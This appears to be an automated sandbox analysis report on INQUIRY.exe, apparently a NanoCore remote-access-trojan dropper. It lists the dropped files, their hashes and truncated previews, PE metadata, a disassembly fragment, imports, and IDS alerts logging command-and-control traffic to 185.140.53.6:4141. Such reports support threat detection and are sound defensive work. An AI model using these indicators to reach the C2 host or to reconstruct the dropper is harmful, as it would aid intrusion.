SHA-256:	DAAEED4ABBDCB59F82CB65AC2C32929E52E821E9068A2B453ABD3118DF1E9378
SHA-512:	296D4B41119F294E4D86B7CA5EE395C05F3AD9520B98391DACD34AECCCB733092DB7134CBA935863D5E45235C593171B71D8507292AD44E6B9FE8BD6BF5C20C0
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0...0..Ln...0..Ln...0..In...0..Ln...0..Rich.0..........................PE..L......a...........!.....8...................P............................................@..........................P..H...8Q.......`.......................p..p....................................................P...............................text....6.......8.................. ..`.rdata..&....P.......<..............@..@.rsrc........`.......D..............@..@.reloc..p....p.......F..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv9D9C.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
File Type:	data
Category:	dropped
Size (bytes):	328199
Entropy (8bit):	7.763501353201283
Encrypted:	false
SSDEEP:	6144:KU0YEMx0q3EXCouk+eWWP1QbXva183aCT0B/ER78PemFd/1OF2:QYxZ3Q8Heldu4IaCTm/HX5q2
MD5:	6EB0F8E8E159CC6BE6F7C45CA7B714F2
SHA1:	85A286A84D5344F29261BAC2622C98F61DC3BC6A
SHA-256:	F85D1A62A230E16ACCF48069072C12F4EDD62350375FF21AF97257AC90CF8874
SHA-512:	D6D0EA566DC37B961F2A16BF6BC892B261B92183C3BDB709F2B895E2BBA6E3E8DE1AD4A7D99767ECEA5890A364FA759DFD7E3C274F4B2080BBF9C3624A668544
Malicious:	false
Reputation:	low
Preview:	.\......,...................F...lE.......[......m\..........................................................................................................................................................................................................................................J...............#...j...........................................................................................................................................$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll

Download File

Process:	C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18432
Entropy (8bit):	5.728423253996569
Encrypted:	false
SSDEEP:	384:fWrH9a+lIcHqWIHcJALBQNdZCvSdQkU7kO0Kkqb:0nlIfWILoLUSdQHkJKT
MD5:	964F57C518C022C62A555DEB4E48D02E
SHA1:	B71006B1850415DDF27B656A18382963EDBD4C9D
SHA-256:	DAAEED4ABBDCB59F82CB65AC2C32929E52E821E9068A2B453ABD3118DF1E9378
SHA-512:	296D4B41119F294E4D86B7CA5EE395C05F3AD9520B98391DACD34AECCCB733092DB7134CBA935863D5E45235C593171B71D8507292AD44E6B9FE8BD6BF5C20C0
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0...0..Ln...0..Ln...0..In...0..Ln...0..Rich.0..........................PE..L......a...........!.....8...................P............................................@..........................P..H...8Q.......`.......................p..p....................................................P...............................text....6.......8.................. ..`.rdata..&....P.......<..............@..@.rsrc........`.......D..............@..@.reloc..p....p.......F..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsz814A.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
File Type:	data
Category:	dropped
Size (bytes):	328199
Entropy (8bit):	7.763501353201283
Encrypted:	false
SSDEEP:	6144:KU0YEMx0q3EXCouk+eWWP1QbXva183aCT0B/ER78PemFd/1OF2:QYxZ3Q8Heldu4IaCTm/HX5q2
MD5:	6EB0F8E8E159CC6BE6F7C45CA7B714F2
SHA1:	85A286A84D5344F29261BAC2622C98F61DC3BC6A
SHA-256:	F85D1A62A230E16ACCF48069072C12F4EDD62350375FF21AF97257AC90CF8874
SHA-512:	D6D0EA566DC37B961F2A16BF6BC892B261B92183C3BDB709F2B895E2BBA6E3E8DE1AD4A7D99767ECEA5890A364FA759DFD7E3C274F4B2080BBF9C3624A668544
Malicious:	false
Reputation:	low
Preview:	.\......,...................F...lE.......[......m\..........................................................................................................................................................................................................................................J...............#...j...........................................................................................................................................$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsz814B.tmp\gerys.dll

Download File

Process:	C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18432
Entropy (8bit):	5.728423253996569
Encrypted:	false
SSDEEP:	384:fWrH9a+lIcHqWIHcJALBQNdZCvSdQkU7kO0Kkqb:0nlIfWILoLUSdQHkJKT
MD5:	964F57C518C022C62A555DEB4E48D02E
SHA1:	B71006B1850415DDF27B656A18382963EDBD4C9D
SHA-256:	DAAEED4ABBDCB59F82CB65AC2C32929E52E821E9068A2B453ABD3118DF1E9378
SHA-512:	296D4B41119F294E4D86B7CA5EE395C05F3AD9520B98391DACD34AECCCB733092DB7134CBA935863D5E45235C593171B71D8507292AD44E6B9FE8BD6BF5C20C0
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0...0..Ln...0..Ln...0..In...0..Ln...0..Rich.0..........................PE..L......a...........!.....8...................P............................................@..........................P..H...8Q.......`.......................p..p....................................................P...............................text....6.......8.................. ..`.rdata..&....P.......<..............@..@.rsrc........`.......D..............@..@.reloc..p....p.......F..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\taudoswyo

Download File

Process:	C:\Users\user\Desktop\INQUIRY.exe
File Type:	data
Category:	dropped
Size (bytes):	7539
Entropy (8bit):	6.073593928396658
Encrypted:	false
SSDEEP:	192:dCBXlCcDOOqcG8KiqmpLiu90E6lJu96utIdlxaP:4trDOOqcGce807u0u2fxy
MD5:	7AA8D1B3501B957F963AD8B0E873510C
SHA1:	8DF70D69A3B89166FAF60D2E8BB0F2BADBA9CB10
SHA-256:	350C38CCDE959E201754E7469F8149A7548A789160B202CF6397AAF439987638
SHA-512:	0926C416DA709AE8ECB6C79A300BB2692A80541C183859C959F292B4E9201DB8937CD2E5D757318FD60311B1F1D77C3B0C93E5330BC82A5A89D0F477BE7E6874
Malicious:	false
Reputation:	low
Preview:	..qtt............tI.4.IE..I.4.IE.....t1..Lttt...t9_h9_D....ttt.....9_h9_D....ttt.....9_h9_D....ttt.,..(9_h9_D....ttt.4..0.WDpb..l\|.4uu.h.......D..p%+.........p3%..D{....u...p6........%.tttt.pPo-M..9_.{9_.~9_,.\|9_4.{9_.Y9_.z..`D...h...T..s_.9_..~.lIo..u...tttt1.PpUttt.pPg-..zY..Yz}..w6ht.....I.4.IE...l.t..heT.l.t.D.@3....3p...l.t..l.s.......w6ht.B.2..\vtt..vtt6@t..9...vtt.xvtt6lt.gx....vtt..vtt6lt.....LI.4.IE..1..Dttt.....W.t`B..2tt...........@ott.4`..l..l{.+t.g..g.....l{3.t.g..g..v.l\|.4t.o....9...stt..*.99...I...9_l..999...W.t`r...t.q1..sttt....w6pt......I.4.IE..1..Lttt.4...W.t`B..2tt............ptt.4I..ttt.l..l{.+t.g4.g0.h..l{3.t.g4.g0.D..l{...g4.g0.@%+.l~..u.?4.?0....l{3.v.g4.g0.o.l\|.4t.o4..B.2...ttt....99...W<t`l...<.s.A9_<9_@9_D9_h9_l.!.99...W.t`r...t.q1..sttt....w6@t.....81..Dttt.....W.t`B..2tt............utt.4`..l..l{.+t.g..g..h..l{3.t.g..g..v.l\|.4t.o...gx...Qttt..P.99...j9_

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat

Download File

Process:	C:\Users\user\Desktop\INQUIRY.exe
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKgmR7kkmefoeLBizbCuVkqYM:X4LDAnybgCFcps0OafmCYDlizZr/i/Oh
MD5:	9E7D0351E4DF94A9B0BADCEB6A9DB963
SHA1:	76C6A69B1C31CEA2014D1FD1E222A3DD1E433005
SHA-256:	AAFC7B40C5FE680A2BB549C3B90AABAAC63163F74FFFC0B00277C6BBFF88B757
SHA-512:	93CCF7E046A3C403ECF8BC4F1A8850BA0180FE18926C98B297C5214EB77BC212C8FBCC58412D0307840CF2715B63BE68BACDA95AA98E82835C5C53F17EF38511
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Download File

Process:	C:\Users\user\Desktop\INQUIRY.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:3e8t:B
MD5:	CF0C25BF3DC4FFBB8F3E0CDC145DD33E
SHA1:	6ED58B87F71DA1F789EB1A81A6FB08C314FB508A
SHA-256:	34B778FCE744D50ADF7F57F7CA5480538294B496E425C141ED07EBC5A17CB81F
SHA-512:	D22752D21943BD8DBF30B48066B1F8DCDB139467D4352A7E114DBBBE4EB082F8A3566F0865DE93B138FDAC5FEE83D673C32D727B864419572C382EFBA8D960F8
Malicious:	true
Preview:	k=.>...H

C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe

Download File

Process:	C:\Users\user\Desktop\INQUIRY.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	315125
Entropy (8bit):	7.883283847039061
Encrypted:	false
SSDEEP:	6144:/w8yH0o3Hx8NFIImn7/q7cly7x5rYFggsIKW4BSusOM0odo5BehhFl7/:W0vII073lMhYOsKPBSusOWo5Al7/
MD5:	DC0ACC75361BB39FBD4ABEC6EDC82CD5
SHA1:	9E9C823725BEE12D0980009C04692AD9089D9308
SHA-256:	D73CBCB2D300D84618D476706765B185C12D20D2E52AFE120FB587C81BE7CC80
SHA-512:	F40CB60C1D80B09322783BFC83C34784CD28F9B6462701AA069C867986DF99DB06CB088203B02D6F6CA8CCB95FF60AE856D8B92FC2D40BC64E1134EB950CC996
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s..........HA...........................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc...HA.......B...t..............@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.883283847039061
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	INQUIRY.exe
File size:	315125
MD5:	dc0acc75361bb39fbd4abec6edc82cd5
SHA1:	9e9c823725bee12d0980009c04692ad9089d9308
SHA256:	d73cbcb2d300d84618d476706765b185c12d20d2e52afe120fb587c81be7cc80
SHA512:	f40cb60c1d80b09322783bfc83c34784cd28f9b6462701aa069c867986df99db06cb088203b02d6f6ca8ccb95ff60ae856d8b92fc2d40bc64e1134eb950cc996
SSDEEP:	6144:/w8yH0o3Hx8NFIImn7/q7cly7x5rYFggsIKW4BSusOM0odo5BehhFl7/:W0vII073lMhYOsKPBSusOWo5Al7/
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

File Icon


Icon Hash:	0c129232d9ccc41b

Static PE Info

General

Entrypoint:	0x403225
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409128h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007F9F28CAD860h
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F450h
call dword ptr [00407158h]
push 004091B0h
push 004236A0h
call 00007F9F28CAD517h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007F9F28CAD505h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007F9F28CAAD2Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F9F28CACFF8h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F9F28CAAD85h
cmp cl, 00000020h
jne 00007F9F28CAAD28h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F9F28CAAD1Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x4148	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5976	0x5a00	False	0.668619791667	data	6.46680044621	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	False	0.444878472222	data	5.17796812871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1af98	0x400	False	0.55078125	data	4.68983486809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x24000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x4148	0x4200	False	0.209753787879	data	3.76510054969	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c1f0	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4289923840, next used block 4289923840	English	United States
RT_ICON	0x2e798	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4289923840, next used block 4289923840	English	United States
RT_ICON	0x2f840	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x2fca8	0x100	data	English	United States
RT_DIALOG	0x2fda8	0x11c	data	English	United States
RT_DIALOG	0x2fec8	0x60	data	English	United States
RT_GROUP_ICON	0x2ff28	0x30	data	English	United States
RT_MANIFEST	0x2ff58	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/24/22-02:24:20.152195	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	59123	8.8.8.8	192.168.2.4
01/24/22-02:24:20.743770	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49735	4141	192.168.2.4	185.140.53.6
01/24/22-02:24:26.623926	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	54531	8.8.8.8	192.168.2.4
01/24/22-02:24:26.701611	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49742	4141	192.168.2.4	185.140.53.6
01/24/22-02:24:31.333067	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49743	4141	192.168.2.4	185.140.53.6
01/24/22-02:24:37.493200	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49750	4141	192.168.2.4	185.140.53.6
01/24/22-02:24:43.325751	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	53097	8.8.8.8	192.168.2.4
01/24/22-02:24:43.429089	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49757	4141	192.168.2.4	185.140.53.6
01/24/22-02:24:50.367349	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	62389	8.8.8.8	192.168.2.4
01/24/22-02:24:50.487020	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49760	4141	192.168.2.4	185.140.53.6
01/24/22-02:24:56.459195	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49767	4141	192.168.2.4	185.140.53.6
01/24/22-02:25:02.430704	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	55854	8.8.8.8	192.168.2.4
01/24/22-02:25:02.524995	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49774	4141	192.168.2.4	185.140.53.6
01/24/22-02:25:08.907834	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	64549	8.8.8.8	192.168.2.4
01/24/22-02:25:08.993738	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49777	4141	192.168.2.4	185.140.53.6
01/24/22-02:25:14.871570	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	63153	8.8.8.8	192.168.2.4
01/24/22-02:25:14.965823	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49778	4141	192.168.2.4	185.140.53.6
01/24/22-02:25:21.071315	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49779	4141	192.168.2.4	185.140.53.6
01/24/22-02:25:27.268831	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49782	4141	192.168.2.4	185.140.53.6
01/24/22-02:25:33.435841	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56534	8.8.8.8	192.168.2.4
01/24/22-02:25:33.543043	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49788	4141	192.168.2.4	185.140.53.6
01/24/22-02:25:39.718199	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49789	4141	192.168.2.4	185.140.53.6
01/24/22-02:25:45.786163	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49791	4141	192.168.2.4	185.140.53.6
01/24/22-02:25:51.826837	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49792	4141	192.168.2.4	185.140.53.6
01/24/22-02:25:58.115693	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49810	4141	192.168.2.4	185.140.53.6
01/24/22-02:26:04.066618	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50601	8.8.8.8	192.168.2.4
01/24/22-02:26:04.236531	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49827	4141	192.168.2.4	185.140.53.6
01/24/22-02:26:10.220319	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60875	8.8.8.8	192.168.2.4
01/24/22-02:26:10.485870	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49831	4141	192.168.2.4	185.140.53.6
01/24/22-02:26:16.639258	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56448	8.8.8.8	192.168.2.4
01/24/22-02:26:16.719867	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49833	4141	192.168.2.4	185.140.53.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 24, 2022 02:24:20.164705038 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:20.700340986 CET	4141	49735	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:20.700464010 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:20.743769884 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:21.016308069 CET	4141	49735	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:21.016460896 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:21.349014997 CET	4141	49735	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:21.349283934 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:21.448935986 CET	4141	49735	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:21.467855930 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:21.753155947 CET	4141	49735	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:21.753386974 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:22.075184107 CET	4141	49735	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:22.075364113 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:22.369034052 CET	4141	49735	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:22.369168997 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:22.544080019 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:22.647011995 CET	4141	49735	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:22.647120953 CET	49735	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:26.625017881 CET	49742	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:26.700880051 CET	4141	49742	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:26.701059103 CET	49742	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:26.701611042 CET	49742	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:26.815442085 CET	4141	49742	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:31.237526894 CET	49743	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:31.332380056 CET	4141	49743	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:31.332499981 CET	49743	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:31.333066940 CET	49743	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:31.577058077 CET	4141	49743	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:31.577172995 CET	49743	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:31.879667997 CET	4141	49743	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:31.879786015 CET	49743	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:32.297938108 CET	49743	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:32.381290913 CET	4141	49743	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:32.886949062 CET	49743	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:32.983927965 CET	4141	49743	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:32.990437984 CET	4141	49743	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:33.045161009 CET	49743	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:33.198896885 CET	49743	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:37.408591032 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:37.492502928 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:37.492675066 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:37.493200064 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:37.705472946 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:37.705645084 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:38.014137030 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:38.014259100 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:38.120289087 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:38.120460987 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:38.442538023 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:38.442656040 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:38.739780903 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:38.739892960 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:38.925431013 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:38.925496101 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:38.925570011 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:38.925636053 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.027493000 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.027575970 CET	4141	49750	185.140.53.6	192.168.2.4
